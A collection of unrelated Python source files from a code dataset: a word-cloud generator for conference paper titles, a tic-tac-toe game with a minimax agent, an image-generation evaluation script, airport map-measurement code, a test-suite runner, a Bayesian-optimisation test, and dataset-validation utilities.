webhtml = RemoveHTMLComments(page.text)
titles = GetPaperTitles(webhtml, prefix)
titleWords = GetPaperTitleWords(titles)
titleWords = RemoveCommonWords(titleWords)
allWords = allWords + titleWords
topWords = GetTopWords(titleWords, 10)
nWords = len(titleWords)
print("Found %d potentially useful words" % (nWords))
# print(page.text)
if nWords > 10:
outFile.write("<p class=\"topic_header\"><a href = %s>%s %s (%d)</a></p>" % (fetchURL, title, Year, nWords))
outFile.write("\n<div class=\"topic_content\">\n")
for word in topWords:
fontSizePc = 100
textdarkness = 250
freq = 100.0 * float(word[1])/float(nWords)
if (freq > 1.0): fontSizePc, textdarkness = 250, 250
elif(freq > 0.9): fontSizePc, textdarkness = 200, 225
elif(freq > 0.8): fontSizePc, textdarkness = 180, 200
elif(freq > 0.7): fontSizePc, textdarkness = 150, 150
elif(freq > 0.6): fontSizePc, textdarkness = 125, 100
elif(freq > 0.5): fontSizePc, textdarkness = 100, 50
elif(freq > 0.4): fontSizePc, textdarkness = 70, 40
elif(freq > 0.3): fontSizePc, textdarkness = 50, 40
elif(freq > 0.2): fontSizePc, textdarkness = 30, 40
elif(freq > 0.1): fontSizePc, textdarkness = 20, 40
elif(freq > 0.05): fontSizePc, textdarkness = 10, 40
else: fontSizePc, textdarkness = 5, 40
textintensity = 255 - textdarkness
outFile.write("<span style=\"font-size: %d%%; color: rgb(%d,%d,%d)\">%s</span> (%d) " % (fontSizePc, textintensity, textintensity, textintensity, word[0], word[1]))
outFile.write("\n</div>\n")
rawWords = rawWords + "<li><span style=\"font-size: 250%%\">%s %s</span><br>" % (title, Year) + (", ").join(titleWords) + "\n\n"
else:
print ("error")
except: #urllib.request.URLError as e:
print ("Error: " + str(sys.exc_info()))
return None
outFile.write("</td></tr></table>\n")
rawWords = rawWords + "</ul>\n"
#outFile.write("<p><strong>Raw Words:</strong> " + rawWords + "\n")
outFile.write(HTML_POSTFIX)
outFile.close()
return allWords
def revYearRange(beg, end):
return reversed([str(y) for y in range(beg, end+1)])
allWords = {}
allWords["cvpr"] = findTop5Words("CVPR", ".py", "CVPR", revYearRange(2013, datetime.today().year+1), "cvpr.html")
allWords["sig"] = findTop5Words("sig", ".html", "SIGGRAPH", revYearRange(2008, datetime.today().year+1), "sig.html")
allWords["siga"] = findTop5Words("siga", "Papers.htm", "SIGGRAPH Asia", revYearRange(2008, datetime.today().year+1), "siga.html")
allWords["hpg"] = findTop5Words("hpg", "Papers.htm", "HPG", revYearRange(2009, datetime.today().year+1), "hpg.html")
allWords["egsr"] = findTop5Words("egsr", "Papers.htm", "EGSR", revYearRange(2009, datetime.today().year+1), "egsr.html")
for awk in allWords.keys():
aw = allWords[awk]
aw = list(GetTopWords(aw, 500))
wordlist = ",".join([a[0] for a in aw])
f = open(awk + "_words.txt", "w")
f.write(wordlist)
f.close()
| StarcoderdataPython |
69087 | <filename>tictactoe.py
#!/usr/bin/env python
# coding=utf-8
__author__ = 'Xevaquor'
__license__ = 'MIT'
from copy import deepcopy
import random
from minmax import MinmaxAgent
from common import Field
class RandomAgent(object):
def __init__(self, symbol=Field.Circle):
self.symbol = symbol
def make_move(self, state, game):
valid_moves = filter(lambda m: m[0] == self.symbol, game.get_legal_moves(state))
return random.choice(valid_moves)
class HumanAgent(object):
def __init__(self, symbol=Field.Cross):
self.symbol = symbol
def make_move(self, state, game):
while True:
coords = tuple(map(int, raw_input("Gimme coordinates: (y x) ").split(' ')))
move = (self.symbol, coords)
if move in game.get_legal_moves(state, self.symbol):
return move
class State(object):
def __init__(self):
self.grid = [
[Field.Empty, Field.Empty, Field.Empty],
[Field.Empty, Field.Empty, Field.Empty],
[Field.Empty, Field.Empty, Field.Empty]
]
def __str__(self):
lines = []
for y in range(3):
# noinspection PyTypeChecker
lines.append('|' + ''.join(self.grid[y]) + '|')
return '+---+\n' + '\n'.join(lines) + '\n+---+\n'
# noinspection PyMethodMayBeStatic
class TicTacToe(object):
def __init__(self):
pass
def get_start_state(self):
return State()
def get_legal_moves(self, state, player):
moves = []
for y in range(3):
for x in range(3):
if state.grid[y][x] == Field.Empty:
moves += [(player, (y, x))]
return moves
def apply_move(self, state, move):
player, coord = move
y, x = coord
new_state = deepcopy(state)
new_state.grid[y][x] = player
return new_state
def has_won(self, state, player):
winning_combinations = [
[(0, 0), (1, 0), (2, 0)],
[(0, 1), (1, 1), (2, 1)],
[(0, 2), (1, 2), (2, 2)],
[(0, 0), (1, 1), (2, 2)],
[(0, 2), (1, 1), (2, 0)],
[(0, 0), (0, 1), (0, 2)],
[(1, 0), (1, 1), (1, 2)],
[(2, 0), (2, 1), (2, 2)]
]
for combination in winning_combinations:
streak = True
for y, x in combination:
if state.grid[y][x] != player:
streak = False
break
if streak:
return True
return False
def has_lose(self, state, player):
opponent = Field.Circle if player == Field.Cross else Field.Cross
return self.has_won(state, opponent)
def is_terminal(self, state):
if self.has_won(state, Field.Circle):
return True
if self.has_won(state, Field.Cross):
return True
for y in range(3):
for x in range(3):
if state.grid[y][x] == Field.Empty:
return False
return True
if __name__ == "__main__":
ha = HumanAgent()
ca = MinmaxAgent()
g = TicTacToe()
s = g.get_start_state()
human_turn = True
while True:
if g.has_won(s, Field.Circle):
print "Circle won!"
break
elif g.has_won(s, Field.Cross):
print "Cross won!"
break
elif g.is_terminal(s):
print "DRAW!"
break
if human_turn:
print s
taken_move = ha.make_move(s, g)
else:
taken_move = ca.make_move(s, g)
s = g.apply_move(s, taken_move)
human_turn = not human_turn
print "Game finished"
print s
| StarcoderdataPython |
3297201 | from evaluation.inception import InceptionScore
import re
import cv2
import numpy as np
import pandas as pd
import matplotlib
from sg2im.data import deprocess_batch, imagenet_deprocess
from sg2im.data.utils import decode_image
matplotlib.use('Agg')
from sg2im.meta_models import MetaGeneratorModel
import argparse, os
import torch
from types import SimpleNamespace
import json
def check_model_layout(df, model, inception_score, output_dir, deprocess_func, vocab, mode="gt"):
inception_score.clean()
model.args['skip_graph_model'] = True
with torch.no_grad():
img_ind = 0
for i, row in df.iterrows():
try:
print("Iteration {}".format(img_ind))
# Get boxes
if mode == 'pred':
bbox = np.array(eval(row['predicted_boxes']))
else:
bbox = np.array(eval(row['gt_boxes']))
# bbox[:, 2] = bbox[:, 0] + bbox[:, 2]
# bbox[:, 3] = bbox[:, 1] + bbox[:, 3]
# bbox = np.concatenate([bbox, [[0, 0, 1, 1]]], axis=0)
# Get labels
object_class = eval(row['class'])
indx = np.where(np.array(object_class) != '__image__')[0]
label_one_hot = [c for c in object_class if c != "__image__"]
label_one_hot = np.array([vocab["object_name_to_idx"][c] if c in vocab["object_name_to_idx"] else 180 for c in label_one_hot])
# label_one_hot.append(vocab['object_name_to_idx']['__image__'])
# print(label_one_hot)
bbox = bbox[indx]
label_one_hot = label_one_hot[indx]
# Get Image_id
if args.dataset == "vg":
obj_mask = np.array(label_one_hot) < 179
label_one_hot = np.array(label_one_hot)[obj_mask]
bbox = bbox[obj_mask]
# image_id = row['image_id'].split('/')[-1].split('.')[0]
image_id = re.findall(r'\d+', row['image_id'])[0]
else:
# image_id = row['image_id']
image_id = re.findall(r'\d+', row['image_id'])[0]
image_ids = [image_id]
boxes = torch.FloatTensor(bbox).unsqueeze(0)
labels = torch.LongTensor(label_one_hot)
objs = labels.long().unsqueeze(0).unsqueeze(-1).cuda()
samples = {}
triplets, triplet_type, masks = None, None, None
name = '{mode}_box_{mode}_mask'.format(mode=mode)
samples[name] = model(objs, triplets, triplet_type, boxes_gt=boxes, masks_gt=masks, test_mode=True)[0]
# Calc Inception score
inception_score(samples[name])
# Save images
draw_datasets(samples, output_dir, deprocess_func, image_ids)
img_ind += 1
except Exception as e:
print("Exception in iter {} - {}".format(img_ind, e))
inception_mean, inception_std = inception_score.compute_score(splits=5)
print(' >> ' + str(mode.upper()) + ' inception_mean: %.4f' % inception_mean)
print(' >> ' + str(mode.upper()) + ' inception_std: %.4f' % inception_std)
def draw_datasets(samples, output_dir, deprocess_func, image_ids):
for k, v in samples.items():
samples[k] = np.transpose(deprocess_batch(v, deprocess_func=deprocess_func).cpu().numpy(), [0, 2, 3, 1])
for k, v in samples.items():
# Set the output path
if k == 'gt_img':
path = os.path.join(output_dir, "gt")
else:
path = os.path.join(output_dir, "generation", k)
os.makedirs(path, exist_ok=True)
for i in range(v.shape[0]):
RGB_img_i = cv2.cvtColor(v[i], cv2.COLOR_BGR2RGB)
cv2.imwrite("{}/{}.jpg".format(path, image_ids[i]), RGB_img_i)
def main(args):
if not os.path.isfile(args.checkpoint):
print('ERROR: Checkpoint file "%s" not found' % args.checkpoint)
print('Maybe you forgot to download pretraind models? Try running:')
print('bash scripts/download_models.sh')
return
if not os.path.isdir(args.output_dir):
print('Output directory "%s" does not exist; creating it' % args.output_dir)
os.makedirs(args.output_dir)
if args.gpu_ids == 'cpu':
device = torch.device('cpu')
elif args.gpu_ids == 'gpu':
device = torch.device('cuda:0')
if not torch.cuda.is_available():
print('WARNING: CUDA not available; falling back to CPU')
device = torch.device('cpu')
else:
device = torch.device('cuda:{gpu}'.format(gpu=args.gpu_ids[0]))
if not torch.cuda.is_available():
print('WARNING: CUDA not available; falling back to CPU')
device = torch.device('cpu')
# Load the model, with a bit of care in case there are no GPUs
map_location = 'cpu' if device == torch.device('cpu') else device
checkpoint = torch.load(args.checkpoint, map_location=map_location)
trained_args = json.load(open(os.path.join(os.path.dirname(args.checkpoint), 'run_args.json'), 'rb'))
set_args(args, trained_args)
# Model
opt = SimpleNamespace(**trained_args)
opt.skip_graph_model = True
args.dataset = opt.dataset if not args.dataset else args.dataset
model = MetaGeneratorModel(opt, device)
# Load pre-trained weights for generation
model.load_state_dict(checkpoint['model_state'], strict=False)
# Eval
model.eval()
# Put on device
model.to(device)
# Init Inception Score
inception_score = InceptionScore(device, batch_size=opt.batch_size, resize=True)
# Get the data
df = pd.read_csv(args.data_frame)
check_model_layout(df, model, inception_score, args.output_dir, opt.deprocess_func, opt.vocab, mode=args.mode)
print(" >> Dataset generated in {}".format(args.output_dir))
def set_args(args, trained_args):
trained_args['gpu_ids'] = args.gpu_ids
# Define img_deprocess
if trained_args['img_deprocess'] == "imagenet":
trained_args['deprocess_func'] = imagenet_deprocess
elif trained_args['img_deprocess'] == "decode_img":
trained_args['deprocess_func'] = decode_image
else:
print("Error: No deprocess function was found. decode_image was chosen")
trained_args['deprocess_func'] = decode_image
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--checkpoint', default='')
parser.add_argument('--output_dir', default='')
parser.add_argument('--data_frame', default='')
parser.add_argument('--mode', default='pred')
parser.add_argument('--dataset', default='', choices=['vg', 'clevr', 'coco'])
parser.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU')
args = parser.parse_args()
# set gpu ids
str_ids = args.gpu_ids.split(',')
args.gpu_ids = []
for str_id in str_ids:
id = int(str_id)
if id >= 0:
args.gpu_ids.append(id)
if len(args.gpu_ids) > 0:
torch.cuda.set_device(args.gpu_ids[0])
main(args)
| StarcoderdataPython |
3335800 | """
reset database
"""
from patch_tracking.app import app
from patch_tracking.database import reset_database
def reset():
"""
reset database
"""
with app.app_context():
reset_database()
if __name__ == "__main__":
reset()
| StarcoderdataPython |
30179 | import itertools
import math
import pprint
import sys
import typing
import map_funcs
GOOGLE_EARTH_AIRPORT_IMAGES = {
'GoogleEarth_AirportCamera_C.jpg' : {
'path': 'video_images/GoogleEarth_AirportCamera_C.jpg',
'width': 4800,
'height': 3011,
# Originally measured on the 100m legend as 181 px
# 'm_per_px': 100 / (4786 - 4605),
# Corrected to 185 to give runway length of 1650.5 m
'm_per_px': 100 / (4786 - 4601),
'datum': 'runway_23_start',
'measurements': {
# 'datum_1': 'runway_23_end',
'runway_23_start': map_funcs.Point(3217, 204),
'runway_23_end': map_funcs.Point((1310 + 1356) / 2, (2589 + 2625) / 2),
'perimeter_fence': map_funcs.Point(967, 2788),
'red_building': map_funcs.Point(914, 2827),
'helicopter': map_funcs.Point(2630, 1236),
'camera_B': map_funcs.Point(2890, 1103),
'buildings_apron_edge': map_funcs.Point(2213, 1780),
# The next three are from camera B frame 850
# Dark smudge on right
'right_dark_grass': map_funcs.Point(2742, 1137),
# Pale smudge on right where tarmac meets grass
'right_light_grass': map_funcs.Point(2755, 1154),
# Pale smudge on left where tarmac taxiway meets grass
# 'left_light_grass': map_funcs.Point(2492, 1488),
# Bright roofed house
'bright_roofed_house': map_funcs.Point(1067, 2243),
}
},
}
# This is an estimate of the absolute position error in metres of a single point in isolation.
ABSOLUTE_POSITION_ERROR_M = 10.0
# Points this close together have an accuracy of ABSOLUTE_POSITION_ERROR_M.
# If closer then the error is proportionally less.
# If further apart then the error is proportionally greater.
RELATIVE_POSITION_ERROR_BASELINE_M = 1000.0
RELATIVE_BEARING_ERROR_DEG = 0.5
def relative_position_error(distance_between: float) -> float:
"""This returns a relative position error estimate of two points separated by distance_between.
It holds the idea that it is extremely unlikely that two points close together have extreme errors
but as they separate the error is likely to be greater.
"""
return ABSOLUTE_POSITION_ERROR_M * distance_between / RELATIVE_POSITION_ERROR_BASELINE_M
RUNWAY_LENGTH_M = map_funcs.distance(
GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['measurements']['runway_23_start'],
GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['measurements']['runway_23_end'],
GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['m_per_px'],
)
RUNWAY_HEADING_DEG = map_funcs.bearing(
GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['measurements']['runway_23_start'],
GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['measurements']['runway_23_end'],
)
def measurements_relative_to_runway() -> typing.Dict[str, map_funcs.Point]:
"""Returns a dict of measurements in metres that are reduced to the runway axis."""
ret: typing.Dict[str, map_funcs.Point] = {}
datum_name = GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['datum']
origin = GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['measurements'][datum_name]
m_per_px = GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['m_per_px']
for k in GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['measurements']:
pt = GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['measurements'][k]
new_pt = map_funcs.translate_rotate(pt, RUNWAY_HEADING_DEG, origin)
ret[k] = map_funcs.Point(m_per_px * new_pt.x, m_per_px * new_pt.y)
return ret
def bearings_from_camera_b() -> typing.Dict[str, float]:
ret: typing.Dict[str, float] = {}
camera_b = GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['measurements']['camera_B']
m_per_px = GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['m_per_px']
for k, v in GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['measurements'].items():
if k != 'camera_B':
b = map_funcs.bearing(camera_b, v)
b_min, b_max = map_funcs.bearing_min_max(camera_b, v, ABSOLUTE_POSITION_ERROR_M / m_per_px)
ret[k] = b, b_min, b_max
return ret
def main() -> int:
# Check scale and runway length
m_per_px = GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['m_per_px']
print(f'GoogleEarth_AirportCamera_C.jpg scale {m_per_px:0.4f} (m/pixel)')
print(f'GoogleEarth_AirportCamera_C.jpg runway length {RUNWAY_LENGTH_M:.1f} (m)')
print(f'GoogleEarth_AirportCamera_C.jpg runway heading {RUNWAY_HEADING_DEG:.2f} (degrees)')
measurements = measurements_relative_to_runway()
print('X-Y Relative')
for k in measurements:
print(f'{k:24} : x={measurements[k].x:8.1f} y={measurements[k].y:8.1f}')
bearings = bearings_from_camera_b()
print('Bearings')
for k in bearings:
# print(f'{k:24} : {bearings[k]:8.1f}')
b, b_min, b_max = bearings[k]
# print(f'{k:24} : {bearings[k]}')
print(f'{k:24} : {b:8.2f} ± {b_max - b:.2f}/{b_min - b:.2f}')
for a, b in itertools.combinations(('red_building', 'helicopter', 'buildings_apron_edge'), 2):
ba, ba_min, ba_max = bearings[a]
bb, bb_min, bb_max = bearings[b]
print(a, '<->', b)
print(f'{ba - bb:4.2f} {ba_max - bb_min:4.2f} {ba_min - bb_max:4.2f}')
return 0
if __name__ == '__main__':
sys.exit(main()) | StarcoderdataPython |
89385 | <reponame>EricFelixLuther/quiz_app<gh_stars>0
from django.contrib import admin
from .models import Quiz_Set, Question
admin.site.register([Quiz_Set, Question])
| StarcoderdataPython |
1641861 | #!/usr/bin/python2.7
# -*- coding: utf-8 -*-
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
An interface for running test cases as unattended suites.
"""
from __future__ import print_function
import os
from pycopia import logging
from pycopia import getopt
from pycopia.db import models
from pycopia.QA import testloader
SuiteRunnerInterfaceDoc = r"""
Invoke a test suite (TestSuite defined in the database) from a shell.
You can define a suite in the database, give it a name, and run it given that
name. You may also supply its id value (if you know it). If none are specified
a menu will be presented.
Usage:
%s [-hd?] suitename...
Where the arguments are suite names or suite id.
Options:
-h -- Print this help text and return.
-d -- Turn on debugging for tests.
-D -- Turn on debugging for framework.
-v -- Increase verbosity.
-i -- Set flag to run interactive tests.
-I -- Set flag to skip interactive tests.
-c or -f <file> -- Merge in extra configuration file.
-n <string> -- Add a comment to the test report.
Long-style options are passed into the test suite configuration.
"""
class SuiteRunnerInterface(object):
def __init__(self, testrunner):
self.runner = testrunner
self.dbsession = models.get_session()
cf = self.runner.config
cf.flags.DEBUG = 0
cf.flags.VERBOSE = 0
cf.flags.INTERACTIVE = False
cf.userinterfacetype = "none"
def __del__(self):
self.dbsession.close()
def __call__(self, argv):
"""Invoke the suite runner by calling it with argument list.
"""
cf = self.runner.config
optlist, extraopts, args = getopt.getopt(argv[1:], "h?dDviIc:f:n:")
for opt, optarg in optlist:
if opt in ("-h", "-?"):
print (SuiteRunnerInterfaceDoc % (os.path.basename(argv[0]),))
return
if opt == "-d":
cf.flags.DEBUG += 1
if opt == "-D":
from pycopia import autodebug # top-level debug for framework bugs
if opt == "-v":
cf.flags.VERBOSE += 1
if opt == "-i":
cf.flags.INTERACTIVE = True
if opt == "-I":
cf.flags.INTERACTIVE = False
if opt == "-c" or opt == "-f":
cf.mergefile(optarg)
if opt == "-n":
cf.comment = optarg
cf.evalupdate(extraopts)
cf.arguments = [os.path.basename(argv[0])] + argv[1:]
cf.argv = args
self.runner.set_options(extraopts)
if not args:
from pycopia import cliutils
choices = [(row.id, str(row)) for row in models.TestSuite.get_suites(self.dbsession)]
choices.insert(0, (0, "Skip it"))
chosen_id = cliutils.choose_key(dict(choices), 0, prompt="Suite? ")
if chosen_id == 0:
return
args = [chosen_id]
for testsuite in self.get_test_suites(args):
suite = self.get_suite(testsuite)
self.runner.initialize()
self.runner.run_object(suite)
self.runner.finalize()
def get_suite(self, dbsuite):
"""Return a runnable and populated test suite from a TestSuite row object."""
cf = self.runner.config
suite = testloader.get_suite(dbsuite, cf)
for dbtestcase in dbsuite.testcases:
testclass = testloader.get_test_class(dbtestcase)
if testclass is not None:
suite.add_test(testclass)
for subsuite in dbsuite.subsuites:
suite.add_suite(self.get_suite(subsuite, cf))
return suite
def get_test_suites(self, args):
"""Generator that yields valid TestSuite records from the database.
"""
TS = models.TestSuite
for suiteid in args:
try:
suiteid = int(suiteid)
except ValueError:
pass
try:
if type(suiteid) is int:
suite = self.dbsession.query(TS).get(suiteid)
else:
suite = self.dbsession.query(TS).filter(models.and_(TS.name==suiteid, TS.valid==True)).one()
except models.NoResultFound:
logging.warn("No TestSuite with id or name %r" % suiteid)
continue
else:
yield suite
| StarcoderdataPython |
28765 | """
Re-running de novo assembly, this time including reads that map to mobile elements.
"""
import os
import sys
# Setup Django environment.
sys.path.append(
os.path.join(os.path.dirname(os.path.realpath(__file__)), '../'))
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from Bio import SeqIO
from experimental.de_novo_assembly import run_velvet
from main.models import *
def identify_intervals(ag):
# First identify intervals that map to mobile elements.
genbank_filepath = get_dataset_with_type(ag.reference_genome,
Dataset.TYPE.REFERENCE_GENOME_GENBANK).get_absolute_location()
# Extract the proper genome record.
genome_record = None
with open(genbank_filepath) as input_fh:
genome_record_list = SeqIO.parse(input_fh, 'genbank')
for rec in genome_record_list:
if rec.name == 'CP006698':
genome_record = rec
assert genome_record
# Pick out the intervals we want:
# * mobile elements
# * lon gene
intervals = []
found_lon = False
for f in genome_record.features:
if f.type == 'mobile_element':
intervals.append((f.location.start, f.location.end))
if (f.type == 'gene' and 'gene' in f.qualifiers and
f.qualifiers['gene'][0] in ['lon', 'clpX']):
found_lon = True
intervals.append((f.location.start, f.location.end))
assert found_lon
assert 48 == len(intervals)
# Add buffer to each interval in case reads start before or after.
buffer_size = 150
def _add_buffer(i):
return (
max(i[0] - buffer_size, 0),
min(i[1] + buffer_size, len(genome_record))
)
intervals = [_add_buffer(i) for i in intervals]
return intervals
def main():
ag = AlignmentGroup.objects.get(uid='edc74a3d')
intervals = identify_intervals(ag)
for idx, sa in enumerate(ag.experimentsampletoalignment_set.all()):
print idx + 1, 'of', ag.experimentsampletoalignment_set.count()
run_velvet(sa, force_include_reads_in_intervals=intervals,
output_dir_name='velvet_mobile_lon_clpX', force_rerun=True)
if __name__ == '__main__':
main()
| StarcoderdataPython |
1620580 | <gh_stars>10-100
# -*- coding: utf-8 -*-
"""
Test on 1d function
"""
import warnings
warnings.filterwarnings("ignore")
import pytest
import numpy as np
import matplotlib
matplotlib.use('agg')
from nextorch import plotting, bo, utils
from nextorch.parameter import Parameter
def simple_1d(X):
"""1D function y = (6x-2)^2 * sin(12x-4)
Parameters
----------
X : numpy array or a list
1D independent variable
Returns
-------
y: numpy array
1D dependent variable
"""
try:
X.shape[1]
except:
X = np.array(X)
if len(X.shape)<2:
X = np.array([X])
y = np.array([],dtype=float)
for i in range(X.shape[0]):
ynew = (X[i]*6-2)**2*np.sin((X[i]*6-2)*2)
y = np.append(y, ynew)
y = y.reshape(X.shape)
return y
objective_func = simple_1d
# Create a grid with a 0.25 interval
X_init = np.array([[0, 0.25, 0.5, 0.75]]).T
# Get the initial responses
Y_init = objective_func(X_init)
# Initialize an Experiment object Exp
# Set its name, the files will be saved under the folder with the same name
Exp = bo.Experiment('test_out_simple_1d')
# Define parameter space
parameter = Parameter()
Exp.define_space(parameter)
# Import the initial data
# Set unit_flag to true since the X is in a unit scale
Exp.input_data(X_init, Y_init, unit_flag = True)
# Set the optimization specifications
# Here we set the objective function, minimization as the goal
Exp.set_optim_specs(objective_func = objective_func, maximize = False)
# Set a flag for saving png figures
save_fig_flag = True
# Set the number of iterations
n_trials = 10
# Optimization loop
for i in range(n_trials):
# Generate the next experiment point
# X_new is in a unit scale
# X_new_real is in a real scale defined in X_ranges
# Select EI as the acquisition function
X_new, X_new_real, acq_func = Exp.generate_next_point(acq_func_name = 'EI')
# Get the reponse at this point
Y_new_real = objective_func(X_new_real)
# Plot the objective functions, and acqucision function
plotting.response_1d_exp(Exp, mesh_size = 1000, X_new = X_new, plot_real = True, save_fig = save_fig_flag)
plotting.acq_func_1d_exp(Exp, mesh_size = 1000,X_new = X_new, save_fig = save_fig_flag)
# Input X and Y of the next point into Exp object
# Retrain the model
Exp.run_trial(X_new, X_new_real, Y_new_real)
# Obtain the optimum
y_opt, X_opt, index_opt = Exp.get_optim()
# Make a parity plot comparing model predictions versus ground truth values
plotting.parity_exp(Exp, save_fig = save_fig_flag)
# Make a parity plot with the confidence intervals on the predictions
plotting.parity_with_ci_exp(Exp, save_fig = save_fig_flag)
# switch back to interactive mode
# matplotlib.use('TkAgg')
def test_input():
# Test on input X, Y
assert np.all(Exp.X_real[:4, :] == X_init)
assert np.all(Exp.Y_real[:4, :] == Y_init)
def test_opt():
# Test on optimal X and Y
expected_X_opt = pytest.approx(0.75, abs=0.01)
expected_Y_opt = pytest.approx(-6.02, abs=0.01)
assert X_opt[0] == expected_X_opt
assert y_opt == expected_Y_opt
| StarcoderdataPython |
3310782 | # -*- coding: utf-8 -*-
"""Utility functions for mirdata
Attributes:
NoteData (namedtuple): `intervals`, `notes`, `confidence`
F0Data (namedtuple): `times`, `frequencies`, `confidence`
LyricData (namedtuple): `start_times`, `end_times`, `lyrics`, `pronounciations`
SectionData (namedtuple): `start_times`, `end_times`, `sections`
BeatData (namedtuple): `beat_times`, `beat_positions`
ChordData (namedtuple): `start_times`, `end_times`, `chords`
KeyData (namedtuple): `start_times`, '`end_times`, `keys`
EventData (namedtuple): `start_times`, `end_times`, `event`
TempoData (namedtuple): `time`, `duration`, `value`, `confidence`
"""
from collections import namedtuple
import hashlib
import os
import json
import tqdm
from mirdata import download_utils
def md5(file_path):
"""Get md5 hash of a file.
Args:
file_path (str): File path
Returns:
md5_hash (str): md5 hash of data in file_path
"""
hash_md5 = hashlib.md5()
with open(file_path, "rb") as fhandle:
for chunk in iter(lambda: fhandle.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def none_path_join(partial_path_list):
"""Join a list of partial paths. If any part of the path is None,
returns None.
Args:
partial_path_list (list): List of partial paths
Returns:
path or None (str or None): joined path string or None
"""
if None in partial_path_list:
return None
else:
return os.path.join(*partial_path_list)
def log_message(message, verbose=True):
"""Helper function to log message
Args:
message (str): message to log
verbose (bool): if false, the message is not logged
"""
if verbose:
print(message)
def validate(file_id, local_path, checksum, missing_files, invalid_checksums):
# validate that the file exists on disk
if not os.path.exists(local_path):
if file_id not in missing_files.keys():
missing_files[file_id] = []
missing_files[file_id].append(local_path)
# validate that the checksum matches
elif md5(local_path) != checksum:
if file_id not in invalid_checksums.keys():
invalid_checksums[file_id] = []
invalid_checksums[file_id].append(local_path)
def check_files(file_dict, data_home, verbose):
missing = {}
invalid = {}
for file_id, file in tqdm.tqdm(file_dict.items(), disable=not verbose):
# multitrack case
if file_id is 'tracks':
continue
# tracks
else:
for tracks in file.keys():
filepath = file[tracks][0]
checksum = file[tracks][1]
if filepath is not None:
local_path = os.path.join(data_home, filepath)
validate(file_id, local_path, checksum, missing, invalid)
return missing, invalid
def check_metadata(file_dict, data_home, verbose):
missing = {}
invalid = {}
for file_id, file in tqdm.tqdm(file_dict.items(), disable=not verbose):
filepath = file[0]
checksum = file[1]
if filepath is not None:
local_path = os.path.join(data_home, filepath)
validate(file_id, local_path, checksum, missing, invalid)
return missing, invalid
def check_index(dataset_index, data_home, verbose=True):
"""check index to find out missing files and files with invalid checksum
Args:
dataset_index (list): dataset indices
data_home (str): Local home path that the dataset is being stored
verbose (bool): if true, prints validation status while running
Returns:
missing_files (list): List of file paths that are in the dataset index
but missing locally
invalid_checksums (list): List of file paths that file exists in the dataset
index but has a different checksum compare to the reference checksum
"""
missing_files = {}
invalid_checksums = {}
# check index
if 'metadata' in dataset_index and dataset_index['metadata'] is not None:
missing_metadata, invalid_metadata = check_metadata(
dataset_index['metadata'],
data_home,
verbose,
)
missing_files['metadata'] = missing_metadata
invalid_checksums['metadata'] = invalid_metadata
if 'tracks' in dataset_index and dataset_index['tracks'] is not None:
missing_tracks, invalid_tracks = check_files(
dataset_index['tracks'],
data_home,
verbose,
)
missing_files['tracks'] = missing_tracks
invalid_checksums['tracks'] = invalid_tracks
if 'multitracks' in dataset_index and dataset_index['multitracks'] is not None:
missing_multitracks, invalid_multitracks = check_files(
dataset_index['multitracks'],
data_home,
verbose,
)
missing_files['multitracks'] = missing_multitracks
invalid_checksums['multitracks'] = invalid_multitracks
return missing_files, invalid_checksums
def validator(dataset_index, data_home, verbose=True):
"""Checks the existence and validity of files stored locally with
respect to the paths and file checksums stored in the reference index.
Logs invalid checksums and missing files.
Args:
dataset_index (list): dataset indices
data_home (str): Local home path that the dataset is being stored
verbose (bool): if True (default), prints missing and invalid files
to stdout. Otherwise, this function is equivalent to check_index.
Returns:
missing_files (list): List of file paths that are in the dataset index
but missing locally.
invalid_checksums (list): List of file paths that file exists in the
dataset index but has a different checksum compare to the reference
checksum.
"""
missing_files, invalid_checksums = check_index(dataset_index, data_home, verbose)
# print path of any missing files
has_any_missing_file = False
for file_id in missing_files:
if len(missing_files[file_id]) > 0:
log_message("Files missing for {}:".format(file_id), verbose)
for fpath in missing_files[file_id]:
log_message(fpath, verbose)
log_message("-" * 20, verbose)
has_any_missing_file = True
# print path of any invalid checksums
has_any_invalid_checksum = False
for file_id in invalid_checksums:
if len(invalid_checksums[file_id]) > 0:
log_message("Invalid checksums for {}:".format(file_id), verbose)
for fpath in invalid_checksums[file_id]:
log_message(fpath, verbose)
log_message("-" * 20, verbose)
has_any_invalid_checksum = True
if not (has_any_missing_file or has_any_invalid_checksum):
log_message(
"Success: the dataset is complete and all files are valid.", verbose
)
log_message("-" * 20, verbose)
return missing_files, invalid_checksums
NoteData = namedtuple("NoteData", ["intervals", "notes", "confidence"])
F0Data = namedtuple("F0Data", ["times", "frequencies", "confidence"])
MultipitchData = namedtuple(
"MultipitchData", ["times", "frequency_list", "confidence_list"]
)
LyricData = namedtuple(
